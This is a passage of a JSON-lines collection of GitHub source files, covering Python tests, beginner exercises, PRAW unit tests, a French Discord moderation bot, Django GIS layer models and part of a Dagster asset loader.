+{"seq_id":"28647089068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 19 09:57:11 2020\n\n@author: marco\n\"\"\"\nimport numpy as np\nfrom hypothesis import strategies as st\nfrom hypothesis import given, assume\nimport hypothesis.extra.numpy as xn\nimport functions\nimport configparser\n\n\nconfig = configparser.ConfigParser()\nconfig.read('inputs.txt')\n\nN = config.getint('parameters', 'N') \niterations = config.getint('parameters', 'iterations')\nnstep = config.getint('parameters', 'nstep')\nT_min = config.getfloat('parameters', 'T_min')\nT = config.getfloat('parameters', 'T')\nalpha = config.getfloat('parameters', 'alpha')\n\n\n@given(M=st.integers(2,N))\ndef test_leng_positive(M): \n '''\n Tests if the travel lenght is actually positive.\n '''\n city = functions.travel(M)\n citynum = list(range(M))\n assume(len(city[:]==len(citynum)))\n distance = functions.length(M, city, citynum)\n assert distance > 0\n \n \n@given(x=st.integers(0,N-1), y=st.integers(0,N-1), citynum=st.lists(st.integers(1, N-1),min_size=2,max_size=N,unique=True)) \ndef test_breverse(x, y, citynum): \n '''\n Checks if the block reverse move works correctly.\n '''\n assume(x != y)\n citynum1=functions.breverse(x,y, citynum)\n citynum2=functions.breverse(y,x, citynum1)\n assert citynum1 == citynum2\n\n \n@given(x=st.integers(0,N-1), y=st.integers(0,N-1), citynum=st.lists(st.integers(1, N-1),min_size=2,max_size=N,unique=True)) \ndef test_swap(x, y, citynum): \n '''\n Checks if the swap move works correctly.\n '''\n assume(x != y)\n citynum1=functions.swap(x,y, citynum)\n citynum2=functions.swap(y,x, citynum1)\n assert citynum1 == citynum2\n\n\n","repo_name":"siauling108/Simulated-annealing","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71282058729","text":"import random\n\n# ex 1\nalte_numere = [-5, 7, 2, 9, 12, 3, 1, -6, -4, 3]\nnumere_pare = []\nnumere_impare = []\nnumere_pozitive = []\nnumere_negative = []\nfor numar in alte_numere:\n if numar % 2 == 0:\n numere_pare.append(numar)\n else:\n numere_impare.append(numar)\n if numar > 0:\n numere_pozitive.append(numar)\n else:\n numere_negative.append(numar)\nprint(f'Numere pare: {numere_pare}')\nprint(f'Numere impare: {numere_impare}')\nprint(f'Numere negative: {numere_negative}')\nprint(f'Numere pozitive: {numere_pozitive}')\n# ex 2\nfor numar_mare in range(len(alte_numere)):\n for numar_mic in range(numar_mare + 1, (len(alte_numere))):\n if alte_numere[numar_mare] > alte_numere[numar_mic]:\n alte_numere[numar_mare], alte_numere[numar_mic] = alte_numere[numar_mic], alte_numere[numar_mare]\nprint(alte_numere)\n# ex 3\n# print('*' * 80)\n# numar_secret = random.randint(0, 30)\n# numar_ghicit = None\n# while numar_secret != numar_ghicit:\n# print(numar_secret)\n# numar_ghicit = int(input('Ghiceste un numar de la 1 la 30: '))\n# if numar_ghicit > numar_secret:\n# print('Nr secret e mai mic')\n# elif numar_ghicit < numar_secret:\n# print('Nr secret e mai mare')\n# print('Felicitări! 
Ai ghicit!')\n\n# ex 4\n# print('*' * 80)\n# numar_ales = int(input('Introdu un numar: '))\n# for randuri in range(numar_ales + 1):\n# for coloane in range(randuri):\n# print(randuri, end=' ')\n# print('') # linie noua\n\n# ex 5\nprint('*' * 80)\ntastatura_telefon = [\n[1, 2, 3],\n[4, 5, 6],\n[7, 8, 9],\n[0]\n]\nfor randuri in tastatura_telefon:\n for element in randuri:\n print(f'Cifra curentă este {element}')\n","repo_name":"MadalinaDiana/PythonWork","sub_path":"tema4_sesiune4Op.py","file_name":"tema4_sesiune4Op.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70358156009","text":"import pickle\n\nimport pytest\n\nfrom praw.models import LiveThread, LiveUpdate, Redditor\nfrom praw.models.reddit.live import (\n LiveContributorRelationship,\n LiveThreadContribution,\n LiveUpdateContribution,\n)\n\nfrom ... import UnitTest\n\n\nclass TestLiveThread(UnitTest):\n def test_construct_failure(self, reddit):\n message = \"Either 'id' or '_data' must be provided.\"\n with pytest.raises(TypeError) as excinfo:\n LiveThread(reddit)\n assert str(excinfo.value) == message\n\n with pytest.raises(TypeError) as excinfo:\n LiveThread(reddit, id=\"dummy\", _data={\"id\": \"dummy\"})\n assert str(excinfo.value) == message\n\n with pytest.raises(ValueError):\n LiveThread(reddit, \"\")\n\n def test_construct_success(self, reddit):\n thread_id = \"ukaeu1ik4sw5\"\n data = {\"id\": thread_id}\n\n thread = LiveThread(reddit, thread_id)\n assert isinstance(thread, LiveThread)\n assert thread.id == thread_id\n\n thread = LiveThread(reddit, _data=data)\n assert isinstance(thread, LiveThread)\n assert thread.id == thread_id\n\n def test_contrib(self, reddit):\n thread_id = \"ukaeu1ik4sw5\"\n thread = LiveThread(reddit, thread_id)\n assert isinstance(thread.contrib, LiveThreadContribution)\n\n def test_contributor(self, reddit):\n thread_id = \"ukaeu1ik4sw5\"\n thread = LiveThread(reddit, thread_id)\n assert isinstance(thread.contributor, LiveContributorRelationship)\n\n def test_equality(self, reddit):\n thread1 = LiveThread(reddit, id=\"dummy1\")\n thread2 = LiveThread(reddit, id=\"Dummy1\")\n thread3 = LiveThread(reddit, id=\"dummy3\")\n assert thread1 == thread1\n assert thread2 == thread2\n assert thread3 == thread3\n assert thread1 != thread2 # live thread ID in a URL is case sensitive\n assert thread2 != thread3\n assert thread1 != thread3\n assert \"dummy1\" == thread1\n assert thread2 != \"dummy1\"\n assert thread2 == \"Dummy1\"\n\n def test_getitem(self, reddit):\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n thread = LiveThread(reddit, id=thread_id)\n update = thread[update_id]\n assert isinstance(update, LiveUpdate)\n assert update.id == update_id\n\n def test_hash(self, reddit):\n thread1 = LiveThread(reddit, id=\"dummy1\")\n thread2 = LiveThread(reddit, id=\"Dummy1\")\n thread3 = LiveThread(reddit, id=\"dummy3\")\n assert hash(thread1) == hash(thread1)\n assert hash(thread2) == hash(thread2)\n assert hash(thread3) == hash(thread3)\n assert hash(thread1) != hash(thread2)\n assert hash(thread2) != hash(thread3)\n assert hash(thread1) != hash(thread3)\n\n def test_pickle(self, reddit):\n thread = LiveThread(reddit, id=\"dummy\")\n for level in range(pickle.HIGHEST_PROTOCOL + 1):\n other = pickle.loads(pickle.dumps(thread, protocol=level))\n assert thread == other\n\n def test_repr(self, reddit):\n thread = LiveThread(reddit, id=\"dummy\")\n assert repr(thread) == 
\"LiveThread(id='dummy')\"\n\n def test_str(self, reddit):\n thread = LiveThread(reddit, id=\"dummy\")\n assert str(thread) == \"dummy\"\n\n\nclass TestLiveThreadContribution(UnitTest):\n def test_update__no_args(self, reddit):\n thread = LiveThread(reddit, \"xyu8kmjvfrww\")\n assert thread.contrib.update() is None\n\n\nclass TestLiveUpdate(UnitTest):\n def test_construct_failure(self, reddit):\n message = \"Either 'thread_id' and 'update_id', or '_data' must be provided.\"\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n\n with pytest.raises(TypeError) as excinfo:\n LiveUpdate(reddit)\n assert str(excinfo.value) == message\n\n with pytest.raises(TypeError) as excinfo:\n LiveUpdate(reddit, thread_id=thread_id)\n assert str(excinfo.value) == message\n\n with pytest.raises(TypeError) as excinfo:\n LiveUpdate(reddit, update_id=update_id)\n assert str(excinfo.value) == message\n\n def test_construct_success(self, reddit):\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n data = {\"id\": update_id}\n\n update = LiveUpdate(reddit, thread_id=thread_id, update_id=update_id)\n assert isinstance(update, LiveUpdate)\n assert update.id == update_id\n assert isinstance(update.thread, LiveThread)\n assert update.thread.id == thread_id\n\n update = LiveUpdate(reddit, thread_id, update_id)\n assert isinstance(update, LiveUpdate)\n assert update.id == update_id\n assert isinstance(update.thread, LiveThread)\n assert update.thread.id == thread_id\n\n update = LiveUpdate(reddit, _data=data)\n assert isinstance(update, LiveUpdate)\n assert update.id == update_id\n assert update._fetched\n\n def test_contrib(self, reddit):\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n update = LiveUpdate(reddit, thread_id, update_id)\n assert isinstance(update.contrib, LiveUpdateContribution)\n\n data = {\"id\": \"dummy_update_id\", \"author\": \"dummy_author\"}\n update = LiveUpdate(reddit, _data=data)\n assert isinstance(update.contrib, LiveUpdateContribution)\n\n def test_setattr(self, reddit):\n data = {\"id\": \"dummy_update_id\", \"author\": \"dummy_author\"}\n update = LiveUpdate(reddit, _data=data)\n assert isinstance(update.author, Redditor)\n\n def test_thread(self, reddit):\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n\n update = LiveUpdate(reddit, thread_id=thread_id, update_id=update_id)\n assert isinstance(update.thread, LiveThread)\n assert update.thread.id == thread_id\n","repo_name":"praw-dev/praw","sub_path":"tests/unit/models/reddit/test_live.py","file_name":"test_live.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":3211,"dataset":"github-code","pt":"53"} +{"seq_id":"26373640949","text":"# -*- coding: utf-8 -*-\n\n# A lire si vous faîtes une mise à jour et si vous avez ajouté ou modifié les commandes du bot :\n# 1) Copiez vos commandes (pas les commandes par défaut) que vous avez créer dans votre ancienne version dans la nouvelle version.\n# 2) Si vous avez modifié une commande de NextBot par défaut, supprimez la commande de la nouvelle version puis copiez le code de la commande de l'ancienne version dans la nouvelle version.\n\nimport asyncio, discord, os\n\nuser_bot = \"LouveBot\" # Mettez dans cette variable le pseudo du bot.\ntoken = os.environ['BOT_TOKEN'] # Mettez dans cette variable le token du bot\ntrust = os.environ['TRUST_USER'].split(',') # admins du bot\nranks = False\ntry:\n f = open('streamers.txt', 'r', encoding='utf-8')\nexcept IOError:\n f = 
open('streamers.txt', 'w', encoding='utf-8')\nstreamers = f.read().split(\"\\n\")\nf.close()\n\nclient = discord.Client()\nver = \"1.0.0\"\nlang = \"fr\"\n\nprint(\"LouveBot \" + ver + \" \" + lang)\n\n\n@client.event\n@asyncio.coroutine\ndef on_member_update(before, after):\n streamChannel = [chan for chan in after.server.channels if chan.id == \"405352007302643712\"][0]\n if after.game is not None and after.game.url is not None:\n if '#' + str(after).split('#')[1] in streamers and 'twitch.tv' in after.game.url:\n yield from client.send_message(streamChannel, str(after).split('#')[0] + ' est en live GOGOGOGO :\\n' + str(\n after.game) + ' ' + after.game.url)\n\n\n@client.event\n@asyncio.coroutine\ndef on_message(message):\n rep = text = msg = message.content\n rep2 = text2 = msg2 = rep.split()\n user = str(message.author)\n trusted = user in trust\n try:\n memberList = ['#' + member.discriminator for member in message.server.members]\n server_msg = str(message.channel.server)\n chan_msg = str(message.channel.name)\n membersName = [str(member.name) + '#' + str(member.discriminator) for member in message.server.members]\n pm = False\n except AttributeError:\n server_msg = user\n chan_msg = user\n pm = True\n try:\n command = rep2[0].lower()\n params = rep2[0:]\n except IndexError:\n command = \"\"\n params = \"\"\n\n print(user + \" (\" + server_msg + \") [\" + chan_msg + \"] : \" + rep)\n\n if ranks and not pm:\n open(\"msgs_user_\" + server_msg + \".txt\", \"a\").close()\n msgs = open(\"msgs_user_\" + server_msg + \".txt\", \"r\")\n msgs_r = msgs.read()\n if user not in msgs_r:\n msgs_w = open(\"msgs_user_\" + server_msg + \".txt\", \"a\")\n msgs_w.write(user + \":0\\n\")\n msgs_w.close()\n msgs.close()\n msgs = open(\"msgs_user_\" + server_msg + \".txt\", \"r\")\n msgs_r = msgs.read()\n msgs_user = msgs_r.split(user + \":\")[1]\n msgs.close()\n user_msgs_n = int(msgs_user.split(\"\\n\")[0])\n user_msgs_n += 1\n msgs_r = msgs_r.replace(user + \":\" + str(user_msgs_n - 1), user + \":\" + str(user_msgs_n))\n msgs = open(\"msgs_user_\" + server_msg + \".txt\", \"w\")\n msgs.write(msgs_r)\n msgs.close()\n\n # Début des commandes\n\n if command == \"!members_list\":\n yield from client.send_message(message.channel, '\\n'.join(membersName))\n\n if command == \"!test\":\n yield from client.send_message(message.channel, user)\n yield from client.send_message(message.channel, trust)\n\n if command == \"!whereami\":\n yield from client.send_message(message.channel, message.server)\n yield from client.send_message(message.channel, message.channel.id)\n\n if command == \"!commandtest\": # Copiez ce code pour créer une commande\n yield from client.send_message(message.channel, \"Texte à envoyer.\")\n\n if command == \"!saymyname\": # Copiez ce code pour créer une commande\n yield from client.send_message(message.channel, user)\n\n if command == \"!ban\" and trusted and not pm: # Cette commande sert à bannir un utilisateur, and trusted veux dire que la commande est restreinte et que seuls les utilisateurs en trust peuvent utiliser la commande et and not pm veux dire que la commande n'est pas utilisable en PM.\n id_user = message.server.get_member_named(params[\n 1]) # La variable params[1] est le premier paramètre entré par l'utilisateur, cette ligne sert à donner l'identifiant de l'utilisateur à partir du pseudo. 
Pour avoir l'identifiant d'un utilisateur, un serveur ou d'autre chose, vous devez activer le mode développeur\n try:\n yield from client.ban(id_user, int(params[\n 2])) # cette ligne sert à bannir l'utilisateur grâce à la variable id_user qui représente l'identifiant de l'utilisateur à bannir\n except IndexError: # si le nombre de messages à supprimer n'est pas mis (en tapant juste !ban utilisateur), le bot bannira l'utilisateur mais ne supprimera aucun message\n yield from client.ban(id_user, 0)\n\n if command == \"!google\": # Voir la commande !bing\n yield from client.send_message(message.channel, \"https://www.google.com/#q=\" + \"+\".join(params[1:]))\n\n if command == \"!kick\" and trusted and not pm: # Voir la commande !ban\n id_user = message.server.get_member_named(params[1])\n yield from client.kick(id_user)\n\n if (\n command == \"!purge\" or command == \"!clear\") and trusted and not pm: # Cette commande sert à effacer les messages, en tapant !purge 10, le bot supprimera les 10 derniers messages.\n yield from client.purge_from(message.channel, limit=int(params[\n 1])) # Cette ligne sert à supprimer les messages avec params[1] qui est le premier paramètre (le nombre de messages), il y a int(params[1]) car le paramètre doit être converti en un nombre.\n\n if (command == \"!quit\" or command == \"!exit\") and trusted: # Cette commande sert à fermer le bot\n yield from client.close()\n\n if command == \"!role_user_add\" and trusted and not pm: # Cette commande sert à ajouter un rôle à un utilisateur\n member = message.server.get_member_named(params[1])\n role = discord.utils.get(message.server.roles, name=\" \".join(params[\n 2:])) # cette ligne sert à récupérer le rôle de l'utilisateur à ajouter, \" \".join(params[2:]) est le nom du rôle\n yield from client.add_roles(member,\n role) # cette ligne sert à appliquer l'ajout du rôle à l'utilisateur et member est l'identifiant de l'utilisateur et role est l'identifiant du rôle\n\n if command == \"!role_user_remove\" and trusted and not pm: # Cette commande sert à retirer un rôle à un utilisateur\n member = message.server.get_member_named(params[1])\n role = discord.utils.get(message.server.roles, name=\" \".join(params[2:]))\n yield from client.remove_roles(member,\n role) # cette ligne sert à retirer le rôle d'un utilisateur, son fonctionnement est quasi-identique à part qu'elle fait l'inverse (elle retire le rôle au lieu de l'ajouter)\n\n if command == \"!roles\" and trusted and not pm: # Cette commande sert à lister les rôles sur le serveur\n for role in message.server.roles: # cette ligne est une boucle et sert à mettre dans la variable role la liste des rôles du serveur avec message.server.roles\n yield from client.send_message(message.channel, role.id + \" : \" + role.name)\n\n if command == \"!unban\" and trusted and not pm: # Cette commande sert à débannir un utilisateur\n id_user = message.server.get_member_named(params[1])\n yield from client.unban(message.server,\n id_user) # pour débannir un utilisateur, il faut l'identifiant du serveur avec message.serveur et l'identifiant de l'utilisateur (voir !ban)\n\n if command == \"!say\" and trusted: # Cette commande sert à envoyer un message sur un channel du serveur, le paramètre 1 doit être l'identifiant du channel et après, on doit mettre le message (exemple : !say 1234567890 Bonjour !)\n yield from client.send_message(client.get_channel(params[1]), \" \".join(params[2:]))\n\n if command == \"!say_user\" and trusted:\n if params[2].lower() == params[2].upper():\n yield from 
client.send_message(client.get_server(params[1]).get_member(params[2]), \" \".join(params[3:]))\n else:\n yield from client.send_message(client.get_server(params[1]).get_member_named(params[2]),\n \" \".join(params[3:]))\n\n if command == \"!ver\": # Cette commande envoit la version du bot.\n yield from client.send_message(message.channel, \"NextBot \" + ver + \" \" + lang)\n\n if command == \"!streamadd\" and trusted:\n if len(params) == 1:\n yield from client.send_message(message.channel, \"utilisation: !streamadd + #usertag\")\n for userToAdd in params[1:]:\n if userToAdd not in streamers and userToAdd in memberList:\n f2 = open('streamers.txt', 'a', encoding='utf-8')\n f2.write(userToAdd + \"\\n\")\n f2.close()\n streamers.append(userToAdd)\n yield from client.send_message(message.channel,\n userToAdd + \" a bien été ajouté a la liste des streams a afficher\")\n elif userToAdd in memberList:\n yield from client.send_message(message.channel,\n userToAdd + \" fais déjàs partie de la liste des streams a afficher\")\n else:\n yield from client.send_message(message.channel, \"Erreur dans le nom d'utilisateur\")\n\n if command == \"!streamrm\" and trusted:\n if len(params) == 1:\n yield from client.send_message(message.channel, \"utilisation: !streamrm + usertag\")\n for userToRm in params[1:]:\n if userToRm in streamers:\n newStreamList = [user for user in streamers if userToRm != user]\n f2 = open('streamers.txt', 'r+', encoding='utf-8')\n f2.truncate()\n f2.write(\"\\n\".join(newStreamList))\n f2.close()\n streamers.clear()\n for s in newStreamList:\n streamers.append(s)\n yield from client.send_message(message.channel,\n userToRm + \" a bien été supprimé a la liste des streams a afficher\")\n else:\n yield from client.send_message(message.channel, \"Erreur dans le nom d'utilisateur\")\n\n\n# Fin des commandes\n\nclient.run(token)\n","repo_name":"misteurLeu/discordBotu","sub_path":"NextBot 1.0.0.py","file_name":"NextBot 1.0.0.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34484924444","text":"import logging\nimport dateutil.parser\nimport re\nimport json\nimport mappyfile\n\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.utils.translation import gettext as _\nfrom django.contrib.postgres.fields import JSONField, ArrayField\n\n\n# from compositefk.fields import CompositeOneToOneField\n\nfrom translation.models import Translation\n\n\n\n# import reversion\n# Create your models here.\nlogger = logging.getLogger('default')\n\ndef validate_iso8601(value):\n try:\n parsed = dateutil.parser.parse(value)\n except Exception as e:\n raise ValidationError(e)\n return parsed\n\ndef validate_iso8601duration(value):\n # regex to validate iso 8601 duration is borrowed from\n # here: https://stackoverflow.com/a/32045167\n durex = re.compile(r\"^P(?!$)(\\d+(?:\\.\\d+)?Y)?(\\d+(?:\\.\\d+)?M)?(\\d+(?:\\.\\d+)?W)?(\\d+(?:\\.\\d+)?D)?(T(?=\\d)(\\d+(?:\\.\\d+)?H)?(\\d+(?:\\.\\d+)?M)?(\\d+(?:\\.\\d+)?S)?)?$\")\n match = durex.match(value)\n # print(value,match)\n if match:\n return value\n else:\n raise ValidationError(\n _('%(value)s is not a valid ISO 8601 duration'),\n params={'value': value}\n )\n\ndef validate_timing(value):\n if value == 'current':\n return\n \n parts = value.split(',')\n for part in parts:\n if '/' in part:\n try:\n _start,_end,_res = part.split('/')\n except ValueError as e:\n raise 
ValidationError(e)\n validate_iso8601(_start)\n validate_iso8601(_end)\n validate_iso8601duration(_res)\n elif part:\n validate_iso8601(part)\n else:\n # happens e.g. with trailing comma\n raise ValidationError(\n _('Empty string, maybe you have a trailing comma?')\n )\n\n\nclass Dataset(models.Model):\n\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n name = models.CharField(max_length=512, unique=True, db_index=True)\n\n description = models.ForeignKey(\n 'translation.Translation',\n verbose_name=_('description'),\n on_delete=models.SET_NULL,\n related_name='dataset_description',\n null=True\n )\n\n short_description = models.OneToOneField(\n 'translation.Translation',\n verbose_name=_('short_description'),\n on_delete=models.SET_NULL,\n related_name='dataset_short_description',\n null=True\n )\n\n abstract = models.OneToOneField(\n 'translation.Translation',\n verbose_name=_('abstract'),\n on_delete=models.SET_NULL,\n related_name='dataset_abstract',\n null=True\n )\n\n chargeable = models.BooleanField(default=False)\n timing = models.CharField(max_length=256, help_text=\"\"\"Timing can have one of \n the following formats: \n
current | TT | TT,TT,TT | TT/TT/RES\n    where TT is a valid ISO 8601 timestamp (e.g. 2015-05-12T13:54:01Z), \n    and RES is the resolution in the form P[n]Y[n]M[n]DT[n]H[n]M[n]S \n    (e.g. P1Y). Examples\n    2008,2011,2012 \n    2005-11-01T10:15Z/2019-02-15T09:30Z/PT5M
\n \"\"\", \n default='current',\n validators=[validate_timing])\n\n DATATYPE_RASTER = 'raster'\n DATATYPE_POINT = 'point'\n DATATYPE_POLYGON = 'polygon'\n DATATYPE_CHOICES = (\n (DATATYPE_RASTER, 'raster'),\n (DATATYPE_POINT, 'point'),\n (DATATYPE_POLYGON, 'polygon')\n )\n datatype = models.CharField(\n max_length=32,\n choices=DATATYPE_CHOICES,\n default='polygon',\n db_index=True\n )\n\n srs = models.ForeignKey(\n 'geo.SRS',\n on_delete=models.SET_NULL,\n null=True\n )\n\n # Todo: Make this FK to db model which is synced with\n # actual DB\n db_name = models.CharField(max_length=64, null=True)\n\n def __str__(self):\n return self.name\n\n\nclass Metadata(models.Model):\n\n dataset = models.OneToOneField('layers.Dataset', on_delete=models.CASCADE)\n url_infos = models.URLField(max_length=1024, null=True, blank=True)\n url_download = models.URLField(max_length=1024, null=True, blank=True)\n url_portal = models.URLField(max_length=1024, null=True, blank=True)\n\n\nclass Tileset(models.Model):\n\n # TODO LEGACY_CLEANUP: once legacy sync is dropped, add\n # auto_now_add=True and auto_now=True respectively\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(default=timezone.now)\n dataset = models.ForeignKey('layers.Dataset', on_delete=models.CASCADE)\n\n FORMAT_PNG = 'png'\n FORMAT_JPEG = 'jpeg'\n FORMAT_CHOICES = (\n (FORMAT_PNG, 'png'),\n (FORMAT_JPEG, 'jpeg')\n )\n image_type = models.CharField(max_length=10, choices=FORMAT_CHOICES, default=FORMAT_PNG)\n timestamp = models.DateTimeField(default=timezone.now)\n cache_ttl = models.PositiveIntegerField(default=1800, help_text=\"Cache 'time to live'\")\n resolution_min = models.DecimalField(max_digits=7, decimal_places=2, default=4000.0)\n resolution_max = models.DecimalField(max_digits=7, decimal_places=2, default=0.25)\n published = models.BooleanField(default=False, help_text=\"Publication in GetCapabilities\")\n publication_service = models.ForeignKey('publication.WMTS', null=True, blank=True, on_delete=models.SET_NULL)\n\n\nclass MapServerGroup(models.Model):\n dataset = models.ForeignKey('layers.Dataset', on_delete=models.CASCADE)\n mapserver_group_name = models.CharField(max_length=512, null=True, blank=True)\n publication_services = models.ManyToManyField('publication.WMS')\n\n @property\n def name(self):\n return self.mapserver_group_name or self.dataset.name\n\n\nclass VersionedManager(models.Manager):\n # Setting use_for_related_fields to True on the manager will make it\n # available on all relations that point to the model on which you defined\n # this manager as the default manager.\n use_for_related_fields = True\n\n def get_queryset(self):\n return super().get_queryset().filter(current=True)\n\n\n\nclass MapServerLayerManager(models.Manager):\n\n def get_queryset(self):\n return super().get_queryset().prefetch_related('group','group__dataset')\n\n\nclass ExtentField(ArrayField):\n\n def __init__(self, epsg=2056, *args, **kwargs):\n self.epsg = epsg\n # We need four coordinates\n kwargs['size'] = 4\n # Note: we have to pass the base_field as kwargs param\n # and NOT as args param, __init__ is called repeately\n # for ArrayField, the args base_field param is transformed\n # to a kwargs param after the first iteration and results in a\n # \"got multiple values for argument 'base_field'\" error at the\n # second call\n kwargs['base_field'] = models.IntegerField()\n super().__init__(*args, **kwargs)\n\n def to_python(self, value):\n extent = super().to_python(value)\n\n if self.epsg == 2056:\n 
if extent[0] < 2100000 or extent[0] > 2850000:\n raise ValidationError('south west Easting must be between 2100000 and 2850000')\n if extent[1] < 1050000 or extent[1] > 1400000:\n raise ValidationError('south west Northing must be between 1050000 and 1400000')\n if extent[2] < 2100000 or extent[2] > 2850000:\n raise ValidationError('north east Easting must be between 2100000 and 2850000')\n if extent[3] < 1050000 or extent[3] > 1400000:\n raise ValidationError('north east Northing must be between 1050000 and 1400000')\n if extent[2] < extent[0]:\n raise ValidationError('eastern x bound ({}) must larger than western x bound ({})'.format(extent[2], extent[0]))\n if extent[3] < extent[1]:\n raise ValidationError('eastern y bound ({}) must larger than western y bound ({})'.format(extent[2], extent[0]))\n\n return extent\n\n\n\nclass MapServerLayer(models.Model):\n\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(default=timezone.now)\n group = models.ForeignKey(\n 'layers.MapServerGroup',\n on_delete=models.CASCADE\n )\n\n mapserver_layer_name = models.CharField(max_length=512, null=True, blank=True)\n\n mapfile = models.TextField()\n mapfile_json = JSONField(blank=True)\n\n\n\n UNITS_CHOICE_METERS = 'meters'\n UNITS_CHOICES = (\n (UNITS_CHOICE_METERS, _('meters')),\n )\n units = models.CharField(\n max_length=32,\n choices=UNITS_CHOICES,\n default=UNITS_CHOICE_METERS\n )\n\n template = models.CharField(\n max_length=512,\n default='ttt'\n )\n\n status = models.BooleanField(default=True)\n def get_status_display(self):\n return 'ON' if self.status else 'OFF'\n\n wms_extent = ExtentField(null=True)\n wms_enable_request = models.CharField(max_length=128, default='*')\n\n objects = MapServerLayerManager()\n\n class Meta:\n unique_together = (('group', 'mapserver_layer_name'),)\n\n\n @property\n def has_siblings(self):\n return self.group.mapserverlayer_set.all().count() > 1\n \n\n @property\n def name(self):\n return self.mapserver_layer_name or self.group.dataset.name\n\n @property\n def __type__(self):\n return 'layer'\n\n @property\n def metadata(self):\n dct = {}\n dct['__type__'] = 'metadata'\n dct['wms_title'] = self.group.dataset.name\n dct['wms_extent'] = self.wms_extent\n dct['wms_enable_request'] = self.wms_enable_request\n return dct\n \n\n def __str__(self):\n return self.mapserver_layer_name or self.group.dataset.name\n \n def clean(self):\n \"\"\"clean is called during .save() to validate the model fields\"\"\"\n try:\n parsed_mapfile = mappyfile.loads(self.mapfile)\n except Exception as e:\n raise ValidationError(\"couldn't parse mapfile content: {}\".format(e))\n else:\n # print(parsed_mapfile)\n self.mapfile_json = parsed_mapfile\n self.mapfile_json['metadata']['wms_title'] = self.group.dataset.name\n self.mapfile_json['metadata']['wms_timeextent'] = self.group.dataset.timing\n self.mapfile_json['type'] = self.group.dataset.datatype.upper()\n if self.group.dataset.srs:\n self.mapfile_json['projection'] = [\"init={}\".format(self.group.dataset.srs.epsg.lower())]","repo_name":"boecklic/poc-layerservice","sub_path":"layerservice/layers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70035355688","text":"#Задание №2. 
A function that returns three lists (%2==0, %3==0, %4==0).\r\ndef aliquot(num_list):\r\n al_2 = [n for n in num_list\r\n if n%2 == 0]\r\n al_3 = [n for n in num_list\r\n if n%3 == 0]\r\n al_4 = [n for n in num_list\r\n if n%4 == 0]\r\n return al_2, al_3, al_4\r\n\r\n\r\n# demonstration of how the function works\r\nnum_list = [2,3,4,5,6,22,24,25,9,22,6,9]\r\nal_2, al_3, al_4 = aliquot(num_list)\r\n\r\nprint ('a. Divisible by 2:\\n', al_2)\r\nprint ('b. Divisible by 3:\\n', al_3)\r\nprint ('c. Divisible by 4:\\n', al_4)\r\n","repo_name":"Nelistik/WebLab2","sub_path":"task№/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33280743145","text":"class Node:\r\n\tdef __init__(self, name):\r\n\t\tself.name = name\r\n\t\tself.children = []\r\n\r\n\tdef addChild(self, name):\r\n\t\tself.children.append(Node(name))\r\n\t\treturn self\r\n\r\n\t# O(v + e) time | O(v) space\r\n\t\r\n\tdef breadthFirstSearch(self, array):\r\n\t\tqueue = [self]\r\n\t\twhile len(queue) > 0:\r\n\t\t\tcurrent = queue.pop(0)\r\n\t\t\tarray.append(current.name)\r\n\t\t\tfor child in current.children:\r\n\t\t\t\tqueue.append(child)\r\n\t\treturn array","repo_name":"Abhishek-Rout/Competitive-Coding","sub_path":"AlgoExpert/2. Medium/Python/Breadth-first Search/Breadth-first Search.py","file_name":"Breadth-first Search.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
+{"seq_id":"9888403617","text":"from contextlib import ExitStack\nfrom typing import Any, Dict, Mapping, Optional, Type, cast\n\nimport dagster._check as check\nfrom dagster._annotations import public\nfrom dagster._core.definitions.assets import AssetsDefinition\nfrom dagster._core.definitions.events import AssetKey, CoercibleToAssetKey\nfrom dagster._core.definitions.job_definition import (\n default_job_io_manager_with_fs_io_manager_schema,\n)\nfrom dagster._core.definitions.partition_key_range import PartitionKeyRange\nfrom dagster._core.definitions.resource_definition import ResourceDefinition\nfrom dagster._core.definitions.source_asset import SourceAsset\nfrom dagster._core.definitions.utils import DEFAULT_IO_MANAGER_KEY\nfrom dagster._core.execution.build_resources import build_resources, get_mapped_resource_config\nfrom dagster._core.execution.context.input import build_input_context\nfrom dagster._core.execution.context.output import build_output_context\nfrom dagster._core.execution.resources_init import get_transitive_required_resource_keys\nfrom dagster._core.instance import DagsterInstance\nfrom dagster._core.instance.config import is_dagster_home_set\nfrom dagster._core.types.dagster_type import resolve_dagster_type\nfrom dagster._utils.merger import merge_dicts\n\nfrom .io_manager import IOManager\n\n\nclass AssetValueLoader:\n \"\"\"Caches resource definitions that are used to load asset values across multiple load\n invocations.\n\n Should not be instantiated directly. 
